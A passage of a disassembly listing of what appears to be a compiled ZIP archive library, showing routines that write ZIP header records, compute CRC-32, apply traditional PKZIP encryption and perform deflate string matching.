call sub_404640
xor eax, eax
mov al, [edi+11h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+12h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+13h]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+14h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+15h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+16h]
add esp, 40h
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+17h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+18h]
push ecx
push esi
call sub_404640
mov edx, [edi+18h]
shr edx, 8
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+1Ch]
push eax
push esi
call sub_404640
mov ecx, [edi+1Ch]
shr ecx, 8
push ecx
push esi
call sub_404640
mov edx, [edi+18h]
mov eax, [edi+48h]
push edx
push eax
push esi
call sub_4045B0
mov ecx, [edi+1Ch]
mov edx, [edi+3Ch]
push ecx
push edx
push esi
call sub_4045B0
add esp, 48h
pop edi
xor eax, eax
pop esi
retn
sub_416780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416920 proc near ; CODE XREF: sub_416DF0+22C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
push 50h
push esi
call sub_404640
push 4Bh
push esi
call sub_404640
push 7
push esi
call sub_404640
push 8
push esi
call sub_404640
mov edi, [esp+28h+arg_0]
xor eax, eax
mov al, [edi+0Ch]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+0Dh]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+0Eh]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+0Fh]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+10h]
add esp, 40h
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+11h]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+12h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+13h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+14h]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+15h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+16h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+17h]
push edx
push esi
call sub_404640
add esp, 40h
pop edi
xor eax, eax
pop esi
retn
sub_416920 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4169F0 proc near ; CODE XREF: sub_4165C0+CF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
push 50h
push esi
call sub_404640
push 4Bh
push esi
call sub_404640
push 1
push esi
call sub_404640
push 2
push esi
call sub_404640
mov edi, [esp+28h+arg_0]
xor eax, eax
mov al, [edi]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+1]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+2]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+3]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+4]
add esp, 40h
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+5]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+6]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+7]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+8]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+9]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+0Ah]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+0Bh]
push edx
push esi
call sub_404640
add esp, 40h
xor eax, eax
mov al, [edi+0Ch]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+0Dh]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+0Eh]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+0Fh]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+10h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+11h]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+12h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+13h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+14h]
add esp, 40h
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+15h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+16h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+17h]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+18h]
push eax
push esi
call sub_404640
mov ecx, [edi+18h]
shr ecx, 8
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+20h]
push edx
push esi
call sub_404640
mov eax, [edi+20h]
shr eax, 8
push eax
push esi
call sub_404640
add esp, 40h
xor ecx, ecx
mov cl, [edi+24h]
push ecx
push esi
call sub_404640
mov edx, [edi+24h]
shr edx, 8
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+28h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+29h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+2Ah]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+2Bh]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+30h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+31h]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+32h]
add esp, 40h
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+33h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+34h]
push edx
push esi
call sub_404640
xor eax, eax
mov al, [edi+35h]
push eax
push esi
call sub_404640
xor ecx, ecx
mov cl, [edi+36h]
push ecx
push esi
call sub_404640
xor edx, edx
mov dl, [edi+37h]
push edx
push esi
call sub_404640
mov eax, [edi+18h]
mov ecx, [edi+48h]
push eax
push ecx
push esi
call sub_4045B0
mov edx, [edi+20h]
mov eax, [edi+40h]
push edx
push eax
push esi
call sub_4045B0
mov ecx, [edi+24h]
mov edx, [edi+44h]
add esp, 48h
push ecx
push edx
push esi
call sub_4045B0
add esp, 0Ch
pop edi
xor eax, eax
pop esi
retn
sub_4169F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C60 proc near ; CODE XREF: sub_4165C0+105�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
push ebx
push esi
mov esi, [esp+8+arg_14]
push edi
push 50h
push esi
call sub_404640
push 4Bh
push esi
call sub_404640
push 5
push esi
call sub_404640
push 6
push esi
call sub_404640
push 0
push esi
call sub_404640
push 0
push esi
call sub_404640
push 0
push esi
call sub_404640
push 0
push esi
call sub_404640
mov ebx, [esp+4Ch+arg_0]
add esp, 40h
push ebx
push esi
call sub_404640
mov edi, ebx
sar edi, 8
push edi
push esi
call sub_404640
push ebx
push esi
call sub_404640
push edi
push esi
call sub_404640
mov edi, [esp+2Ch+arg_4]
push edi
push esi
call sub_404640
mov eax, edi
shr eax, 8
push eax
push esi
call sub_404640
mov ecx, edi
shr ecx, 10h
push ecx
push esi
call sub_404640
shr edi, 18h
push edi
push esi
call sub_404640
mov edi, [esp+4Ch+arg_8]
add esp, 40h
push edi
push esi
call sub_404640
mov edx, edi
shr edx, 8
push edx
push esi
call sub_404640
mov eax, edi
shr eax, 10h
push eax
push esi
call sub_404640
shr edi, 18h
push edi
push esi
call sub_404640
mov edi, [esp+2Ch+arg_C]
push edi
push esi
call sub_404640
mov ecx, edi
shr ecx, 8
push ecx
push esi
call sub_404640
mov edx, [esp+3Ch+arg_10]
push edi
push edx
push esi
call sub_4045B0
add esp, 3Ch
pop edi
pop esi
xor eax, eax
pop ebx
retn
sub_416C60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416D60 proc near ; CODE XREF: sub_417710+10D�p
; sub_417B60+AB�p
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
mov eax, dword_430AFC
test eax, eax
push esi
push edi
mov edi, [esp+0Ch+arg_0]
jnz short loc_416D94
mov eax, [esp+0Ch+arg_4]
mov ecx, dword_430F50
push eax
push edi
push ecx
call sub_4045F0
mov esi, eax
add esp, 0Ch
cmp esi, 0FFFFFFFFh
jz short loc_416DBA
test esi, esi
jnz short loc_416D98
pop edi
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_416D94: ; CODE XREF: sub_416D60+E�j
mov esi, [esp+0Ch+var_4]
loc_416D98: ; CODE XREF: sub_416D60+2E�j
mov edx, dword_430B40
push esi
push edi
push edx
call sub_417060
mov dword_430B40, eax
mov eax, dword_430B3C
add esp, 0Ch
add eax, esi
mov dword_430B3C, eax
loc_416DBA: ; CODE XREF: sub_416D60+2A�j
pop edi
mov eax, esi
pop esi
pop ecx
retn
sub_416D60 endp
; =============== S U B R O U T I N E =======================================
sub_416DC0 proc near ; CODE XREF: sub_4182D0+4B�p
; sub_418370+29�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
mov eax, [esi]
test eax, eax
jz short loc_416DE2
mov ecx, dword_430B48
mov edx, [esp+4+arg_0]
push ecx
push eax
push 1
push edx
call sub_417530
add esp, 10h
loc_416DE2: ; CODE XREF: sub_416DC0+9�j
mov dword ptr [esi], 0
pop esi
retn
sub_416DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416DF0 proc near ; CODE XREF: sub_4165C0+C8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+48h]
push edi
lea edx, [eax+1]
mov edi, edi
loc_416E00: ; CODE XREF: sub_416DF0+15�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_416E00
sub eax, edx
mov [esi+18h], eax
mov eax, [esi+1Ch]
xor ebp, ebp
cmp eax, ebp
lea ebx, [esi+2Ah]
mov word ptr [ebx], 0FFFFh
mov [esi+30h], ebp
jz short loc_416E2C
mov eax, [esi+3Ch]
push eax
call sub_419DDD
add esp, 4
loc_416E2C: ; CODE XREF: sub_416DF0+2E�j
cmp [esi+20h], ebp
jz short loc_416E42
mov eax, [esi+40h]
cmp [esi+3Ch], eax
jz short loc_416E42
push eax
call sub_419DDD
add esp, 4
loc_416E42: ; CODE XREF: sub_416DF0+3F�j
; sub_416DF0+47�j
mov [esi+40h], ebp
mov [esi+3Ch], ebp
mov [esi+20h], ebp
mov [esi+1Ch], ebp
mov dword_45C3A0, ebp
mov ecx, [esi+5Ch]
mov edx, [esi+58h]
cmp edx, ebp
mov dword_430F50, ecx
mov ecx, 8
mov dword ptr [esi+8], 351C3166h
mov [esp+10h+arg_0], ecx
jz short loc_416E85
mov eax, dword_430AEC
neg eax
sbb eax, eax
and eax, 0FFFFFFFDh
add eax, 17h
jmp short loc_416E8A
; ---------------------------------------------------------------------------
loc_416E85: ; CODE XREF: sub_416DF0+82�j
mov eax, 0B17h
loc_416E8A: ; CODE XREF: sub_416DF0+93�j
lea edi, [esi+4]
mov [esi], ax
mov word ptr [esi+2], 14h
mov [esi+0Ch], ebp
mov [edi], cx
cmp dword_430B14, ebp
jz short loc_416EB0
mov word ptr [edi], 9
mov dword ptr [esi+0Ch], 31660000h
loc_416EB0: ; CODE XREF: sub_416DF0+B2�j
cmp word ptr [ebx], 0FFFFh
mov ax, [edi]
mov [esi+2Ch], ax
mov [esi+6], cx
mov [esi+10h], ebp
mov dword ptr [esi+14h], 0CA000h
mov [esi+28h], bp
jnz short loc_416ED3
mov [ebx], bp
loc_416ED3: ; CODE XREF: sub_416DF0+DE�j
cmp edx, ebp
jnz short loc_416EE6
mov ebp, [esi+30h]
and ebp, 0FF00h
or ebp, 81FF0000h
loc_416EE6: ; CODE XREF: sub_416DF0+E5�j
mov [esi+30h], ebp
mov ebp, [esp+10h+arg_4]
mov ecx, ds:dword_47C3D0
push ebp
push esi
mov [esi+34h], ecx
call sub_416780
mov eax, [esi+1Ch]
mov edx, [esi+18h]
add edx, eax
mov eax, ds:dword_47C3D0
lea ecx, [eax+edx+1Eh]
mov eax, dword_430B14
add esp, 8
test eax, eax
mov ds:dword_47C3D0, ecx
jz short loc_416F49
mov edx, [esi+0Ch]
push ebp
push edx
push eax
call sub_417290
mov edx, [esi+10h]
mov eax, 0Ch
add edx, eax
mov [esi+10h], edx
mov ecx, ds:dword_47C3D0
add esp, 0Ch
add ecx, eax
mov ds:dword_47C3D0, ecx
loc_416F49: ; CODE XREF: sub_416DF0+12E�j
push 1
xor eax, eax
push 400h
mov word ptr [ebx], 0FFFFh
push offset dword_430B50
mov dword_430B3C, eax
mov dword_430B40, eax
mov dword_430B48, ebp
mov off_42A064, offset sub_416D60
call sub_4182A0
lea eax, [esp+1Ch+arg_0]
push eax
push ebx
call sub_418B00
mov ecx, dword_42A04C
push edi
push ecx
call sub_417B60
add esp, 1Ch
call sub_417860
mov ecx, ds:dword_47C3D0
mov edx, dword_430B40
add ecx, eax
mov ds:dword_47C3D0, ecx
mov ebx, ecx
mov [esi+0Ch], edx
mov [esi+10h], eax
mov ecx, dword_430B14
test ecx, ecx
jz short loc_416FC7
add eax, 0Ch
mov [esi+10h], eax
loc_416FC7: ; CODE XREF: sub_416DF0+1CF�j
mov eax, dword_430B3C
mov [esi+14h], eax
mov eax, [esp+10h+arg_0]
mov [esi+6], ax
neg eax
sbb eax, eax
and eax, 0Ah
add eax, 0Ah
mov [esi+2], ax
xor eax, eax
mov ax, [edi]
test al, 1
jnz short loc_416FF6
and eax, 0FFF7h
mov [edi], ax
loc_416FF6: ; CODE XREF: sub_416DF0+1FC�j
mov cx, [edi]
push ebp
mov [esi+2Ch], cx
push esi
mov dword ptr [ebp+0Ch], 0
call sub_416780
add esp, 8
test eax, eax
jnz short loc_417057
mov [ebp+0Ch], ebx
test byte ptr [edi], 1
jz short loc_41702F
push ebp
push esi
call sub_416920
add esp, 8
test eax, eax
jnz short loc_417057
add ds:dword_47C3D0, 10h
loc_41702F: ; CODE XREF: sub_416DF0+228�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_417055
mov eax, [esi+3Ch]
cmp eax, [esi+40h]
jz short loc_41704E
push eax
call sub_419DDD
add esp, 4
mov dword ptr [esi+3Ch], 0
loc_41704E: ; CODE XREF: sub_416DF0+24C�j
mov dword ptr [esi+1Ch], 0
loc_417055: ; CODE XREF: sub_416DF0+244�j
xor eax, eax
loc_417057: ; CODE XREF: sub_416DF0+220�j
; sub_416DF0+236�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_416DF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417060 proc near ; CODE XREF: sub_416D60+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_4]
test esi, esi
jnz short loc_41706D
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41706D: ; CODE XREF: sub_417060+7�j
push ebx
push ebp
push edi
call sub_416740
mov ebp, [esp+10h+arg_8]
cmp ebp, 8
mov edi, [esp+10h+arg_0]
not edi
jb loc_41714D
mov edx, ebp
shr edx, 3
lea ecx, [ecx+0]
loc_417090: ; CODE XREF: sub_417060+E7�j
xor ebx, ebx
mov bl, [esi]
mov ecx, edi
shr ecx, 8
sub ebp, 8
xor ebx, edi
and ebx, 0FFh
mov edi, [eax+ebx*4]
xor ebx, ebx
mov bl, [esi+1]
xor ecx, edi
inc esi
xor ebx, ecx
and ebx, 0FFh
mov edi, [eax+ebx*4]
xor ebx, ebx
mov bl, [esi+1]
shr ecx, 8
xor ecx, edi
inc esi
xor ebx, ecx
and ebx, 0FFh
mov edi, [eax+ebx*4]
xor ebx, ebx
mov bl, [esi+1]
shr ecx, 8
xor ecx, edi
inc esi
xor ebx, ecx
and ebx, 0FFh
mov edi, [eax+ebx*4]
xor ebx, ebx
mov bl, [esi+1]
shr ecx, 8
xor ecx, edi
inc esi
xor ebx, ecx
and ebx, 0FFh
mov edi, [eax+ebx*4]
shr ecx, 8
xor ecx, edi
xor ebx, ebx
mov bl, [esi+1]
inc esi
xor ebx, ecx
and ebx, 0FFh
mov edi, [eax+ebx*4]
shr ecx, 8
xor ecx, edi
xor ebx, ebx
mov bl, [esi+1]
inc esi
xor ebx, ecx
and ebx, 0FFh
mov edi, [eax+ebx*4]
shr ecx, 8
xor ecx, edi
xor ebx, ebx
mov bl, [esi+1]
inc esi
xor ebx, ecx
and ebx, 0FFh
mov edi, [eax+ebx*4]
shr ecx, 8
xor ecx, edi
inc esi
dec edx
mov edi, ecx
jnz loc_417090
loc_41714D: ; CODE XREF: sub_417060+22�j
test ebp, ebp
jz short loc_417169
loc_417151: ; CODE XREF: sub_417060+107�j
xor ecx, ecx
mov cl, [esi]
xor ecx, edi
and ecx, 0FFh
mov ebx, [eax+ecx*4]
shr edi, 8
xor edi, ebx
inc esi
dec ebp
jnz short loc_417151
loc_417169: ; CODE XREF: sub_417060+EF�j
mov eax, edi
pop edi
pop ebp
pop ebx
not eax
pop esi
retn
sub_417060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417180 proc near ; CODE XREF: sub_417530+43�p
arg_0 = dword ptr 4
mov ecx, dword_430F58
mov eax, [esp+arg_0]
mov edx, ecx
xor edx, eax
and edx, 0FFh
shr ecx, 8
push esi
mov esi, dword_430AD8
push edi
xor ecx, [esi+edx*4]
mov edi, dword_430F5C
mov dword_430F58, ecx
and ecx, 0FFh
add ecx, edi
imul ecx, 8088405h
inc ecx
mov dword_430F5C, ecx
mov ecx, dword_430F60
xor edx, edx
mov dl, byte ptr dword_430F5C+3
xor edx, ecx
and edx, 0FFh
mov edi, [esi+edx*4]
shr ecx, 8
xor ecx, edi
pop edi
mov dword_430F60, ecx
pop esi
retn
sub_417180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4171F0 proc near ; CODE XREF: sub_417290+3E�p
; sub_417290+DF�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, 12345678h
mov esi, 23456789h
mov edx, 34567890h
xor ecx, ecx
mov dword_430F58, eax
mov dword_430F5C, esi
mov dword_430F60, edx
mov cl, [edi]
test cl, cl
jz short loc_417287
push ebx
push ebp
mov ebp, dword_430AD8
jmp short loc_417230
; ---------------------------------------------------------------------------
align 10h
loc_417230: ; CODE XREF: sub_4171F0+36�j
; sub_4171F0+93�j
xor ecx, eax
and ecx, 0FFh
mov ebx, [ebp+ecx*4+0]
shr eax, 8
xor eax, ebx
mov ecx, eax
and ecx, 0FFh
add ecx, esi
imul ecx, 8088405h
inc ecx
mov esi, ecx
xor ecx, ecx
mov dword_430F5C, esi
mov cl, byte ptr dword_430F5C+3
mov dword_430F58, eax
xor ecx, edx
and ecx, 0FFh
mov ebx, [ebp+ecx*4+0]
shr edx, 8
xor edx, ebx
inc edi
mov dword_430F60, edx
mov cl, [edi]
test cl, cl
jnz short loc_417230
pop ebp
pop ebx
loc_417287: ; CODE XREF: sub_4171F0+2C�j
pop edi
pop esi
retn
sub_4171F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417290 proc near ; CODE XREF: sub_416DF0+136�p
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 10h
mov eax, dword_42A290
push ebx
mov [esp+14h+var_4], eax
mov eax, dword_430F68
push ebp
inc eax
cmp eax, 1
push esi
push edi
mov dword_430F68, eax
jnz short loc_4172C9
push 0
call sub_419875
mov esi, eax
call sub_422EE6 ; GetCurrentProcessId
xor esi, eax
push esi
call sub_419846
add esp, 8
loc_4172C9: ; CODE XREF: sub_417290+1E�j
mov eax, [esp+20h+arg_0]
push eax
call sub_4171F0
add esp, 4
xor ebp, ebp
loc_4172D8: ; CODE XREF: sub_417290+D4�j
call sub_419853
mov ecx, dword_430F58
mov edi, dword_430AD8
mov edx, dword_430F60
mov ebx, ecx
shr ecx, 8
sar eax, 7
and eax, 0FFh
xor ebx, eax
and ebx, 0FFh
xor ecx, [edi+ebx*4]
mov ebx, dword_430F5C
mov dword_430F58, ecx
and ecx, 0FFh
add ecx, ebx
imul ecx, 8088405h
mov esi, edx
and esi, 0FFFDh
or esi, 2
inc ecx
mov dword_430F5C, ecx
xor ecx, ecx
mov cl, byte ptr dword_430F5C+3
xor ecx, edx
shr edx, 8
and ecx, 0FFh
xor edx, [edi+ecx*4]
mov dword_430F60, edx
mov edx, esi
xor edx, 1
imul edx, esi
shr edx, 8
xor dl, al
mov [esp+ebp+20h+var_10], dl
inc ebp
cmp ebp, 0Ah
jl loc_4172D8
mov eax, [esp+20h+arg_0]
push eax
call sub_4171F0
add esp, 4
xor ebp, ebp
lea esp, [esp+0]
loc_417380: ; CODE XREF: sub_417290+17B�j
mov bl, [esp+ebp+20h+var_10]
mov esi, dword_430F58
xor eax, eax
mov ecx, dword_430F60
mov al, bl
mov edx, ecx
and edx, 0FFFDh
or edx, 2
xor eax, esi
and eax, 0FFh
shr esi, 8
xor esi, [edi+eax*4]
mov eax, esi
mov esi, dword_430F5C
mov dword_430F58, eax
and eax, 0FFh
add eax, esi
imul eax, 8088405h
inc eax
mov dword_430F5C, eax
xor eax, eax
mov al, byte ptr dword_430F5C+3
xor eax, ecx
shr ecx, 8
and eax, 0FFh
xor ecx, [edi+eax*4]
mov dword_430F60, ecx
mov ecx, edx
xor ecx, 1
imul ecx, edx
mov edx, [esp+20h+arg_8]
shr ecx, 8
xor cl, bl
push ecx
push edx
call sub_404640
mov edi, dword_430AD8
add esp, 8
inc ebp
cmp ebp, 0Ah
jl loc_417380
mov esi, [esp+20h+arg_4]
mov eax, dword_430F58
mov ecx, dword_430F60
mov ebx, esi
shr ebx, 10h
mov ebp, ebx
xor ebp, eax
shr eax, 8
and ebp, 0FFh
xor eax, [edi+ebp*4]
mov ebp, dword_430F5C
mov dword_430F58, eax
and eax, 0FFh
add eax, ebp
imul eax, 8088405h
mov edx, ecx
and edx, 0FFFDh
or edx, 2
inc eax
mov dword_430F5C, eax
xor eax, eax
mov al, byte ptr dword_430F5C+3
xor eax, ecx
shr ecx, 8
and eax, 0FFh
xor ecx, [edi+eax*4]
mov edi, [esp+20h+arg_8]
mov dword_430F60, ecx
mov ecx, edx
xor ecx, 1
imul ecx, edx
shr ecx, 8
xor cl, bl
push ecx
push edi
call sub_404640
mov eax, dword_430F58
mov ecx, dword_430F60
mov ebx, esi
mov esi, dword_430AD8
shr ebx, 18h
mov ebp, ebx
xor ebp, eax
shr eax, 8
and ebp, 0FFh
xor eax, [esi+ebp*4]
mov ebp, dword_430F5C
mov dword_430F58, eax
and eax, 0FFh
add eax, ebp
imul eax, 8088405h
mov edx, ecx
and edx, 0FFFDh
or edx, 2
inc eax
mov dword_430F5C, eax
xor eax, eax
mov al, byte ptr dword_430F5C+3
xor eax, ecx
shr ecx, 8
and eax, 0FFh
xor ecx, [esi+eax*4]
mov dword_430F60, ecx
mov ecx, edx
xor ecx, 1
imul ecx, edx
shr ecx, 8
xor cl, bl
push ecx
push edi
call sub_404640
mov ecx, [esp+30h+var_4]
add esp, 10h
pop edi
pop esi
pop ebp
pop ebx
call sub_4192B6
add esp, 10h
retn
sub_417290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417530 proc near ; CODE XREF: sub_416DC0+1A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, dword_430B14
test eax, eax
push ebp
mov ebp, [esp+4+arg_4]
push esi
jz short loc_417592
mov eax, ebp
imul eax, [esp+8+arg_8]
test eax, eax
push edi
mov edi, [esp+0Ch+arg_0]
jz short loc_417591
push ebx
mov ebx, eax
jmp short loc_417560
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
; ---------------------------------------------------------------------------
jmp short loc_417560
; ---------------------------------------------------------------------------
align 10h
loc_417560: ; CODE XREF: sub_417530+22�j
; sub_417530+2B�j ...
movsx eax, byte ptr [edi]
mov esi, dword_430F60
and esi, 0FFFDh
push eax
or esi, 2
call sub_417180
mov dl, [edi]
mov ecx, esi
xor ecx, 1
imul ecx, esi
shr ecx, 8
xor dl, cl
add esp, 4
mov [edi], dl
inc edi
dec ebx
jnz short loc_417560
pop ebx
loc_417591: ; CODE XREF: sub_417530+1D�j
pop edi
loc_417592: ; CODE XREF: sub_417530+D�j
mov esi, [esp+8+arg_8]
mov edx, [esp+8+arg_0]
imul ebp, esi
mov eax, [esp+8+arg_C]
push ebp
push edx
push eax
call sub_4045B0
add esp, 0Ch
mov eax, esi
pop esi
pop ebp
retn
sub_417530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4175C0 proc near ; CODE XREF: sub_417860+C5�p
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 0Ch
mov eax, dword_44C380
mov edx, ds:dword_47C3C4
cmp edx, 7EFAh
push ebx
push ebp
push esi
mov [esp+18h+var_8], eax
mov eax, dword_44C37C
push edi
lea ecx, byte_45C3C0[edx]
mov esi, eax
jbe short loc_4175F7
lea edi, [edx-7EFAh]
mov [esp+1Ch+var_4], edi
jmp short loc_4175FF
; ---------------------------------------------------------------------------
loc_4175F7: ; CODE XREF: sub_4175C0+29�j
mov [esp+1Ch+var_4], 0
loc_4175FF: ; CODE XREF: sub_4175C0+35�j
mov bl, [esi+ecx]
lea ebp, dword_45C4C2[edx]
mov dl, [esi+ecx-1]
mov [esp+1Ch+var_9], dl
cmp eax, dword_44C378
jb short loc_41761D
shr [esp+1Ch+var_8], 2
loc_41761D: ; CODE XREF: sub_4175C0+56�j
mov edi, [esp+1Ch+arg_0]
loc_417621: ; CODE XREF: sub_4175C0+135�j
mov al, byte_45C3C0[edi+esi]
cmp al, bl
lea edx, byte_45C3C0[edi]
jnz loc_4176DB
mov al, [esp+1Ch+var_9]
cmp [edx+esi-1], al
jnz loc_4176DB
mov al, [edx]
cmp al, [ecx]
jnz loc_4176DB
mov al, [edx+1]
inc edx
cmp al, [ecx+1]
jnz loc_4176DB
add ecx, 2
inc edx
nop
loc_417660: ; CODE XREF: sub_4175C0+EA�j
mov al, [ecx+1]
inc ecx
inc edx
cmp al, [edx]
jnz short loc_4176AC
mov al, [ecx+1]
inc ecx
inc edx
cmp al, [edx]
jnz short loc_4176AC
mov al, [ecx+1]
inc ecx
inc edx
cmp al, [edx]
jnz short loc_4176AC
mov al, [ecx+1]
inc ecx
inc edx
cmp al, [edx]
jnz short loc_4176AC
mov al, [ecx+1]
inc ecx
inc edx
cmp al, [edx]
jnz short loc_4176AC
mov al, [ecx+1]
inc ecx
inc edx
cmp al, [edx]
jnz short loc_4176AC
mov al, [ecx+1]
inc ecx
inc edx
cmp al, [edx]
jnz short loc_4176AC
mov al, [ecx+1]
inc ecx
inc edx
cmp al, [edx]
jnz short loc_4176AC
cmp ecx, ebp
jb short loc_417660
loc_4176AC: ; CODE XREF: sub_4175C0+A7�j
; sub_4175C0+B0�j ...
mov edx, ecx
sub edx, ebp
add edx, 102h
cmp edx, esi
lea ecx, [ebp-102h]
jle short loc_4176DB
cmp edx, ds:dword_47C3C8
mov dword_44C384, edi
mov esi, edx
jge short loc_4176FB
mov al, [edx+ecx-1]
mov bl, [edx+ecx]
mov [esp+1Ch+var_9], al
loc_4176DB: ; CODE XREF: sub_4175C0+70�j
; sub_4175C0+7E�j ...
mov eax, [esp+1Ch+var_4]
and edi, 7FFFh
movzx edi, ds:word_46C3C0[edi*2]
cmp edi, eax
jbe short loc_4176FB
dec [esp+1Ch+var_8]
jnz loc_417621
loc_4176FB: ; CODE XREF: sub_4175C0+10E�j
; sub_4175C0+12F�j
pop edi
mov eax, esi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_4175C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417710 proc near ; CODE XREF: sub_417860+293�p
; sub_417B60+CF�p
push ebx
push ebp
push esi
push edi
mov ebp, 8000h
lea esp, [esp+0]
loc_417720: ; CODE XREF: sub_417710+144�j
mov ebx, dword_45C3A0
mov edx, ds:dword_47C3C4
mov ecx, dword_430F74
sub ebx, edx
sub ebx, ecx
cmp ebx, 0FFFFFFFFh
jnz short loc_417745
mov ebx, 0FFFFFFFEh
jmp loc_417806
; ---------------------------------------------------------------------------
loc_417745: ; CODE XREF: sub_417710+29�j
cmp edx, 0FEFAh
jb loc_417806
mov eax, dword_430F70
test eax, eax
jz loc_417806
mov eax, ds:dword_47C3C0
mov ecx, 2000h
mov esi, offset dword_4643C0
mov edi, offset byte_45C3C0
rep movsd
mov esi, dword_44C384
sub eax, ebp
sub esi, ebp
sub edx, ebp
mov ds:dword_47C3C0, eax
mov dword_44C384, esi
mov ds:dword_47C3C4, edx
xor eax, eax
loc_417793: ; CODE XREF: sub_417710+A7�j
movzx ecx, word_44C3A0[eax]
cmp ecx, ebp
jb short loc_4177A6
add ecx, 0FFFF8000h
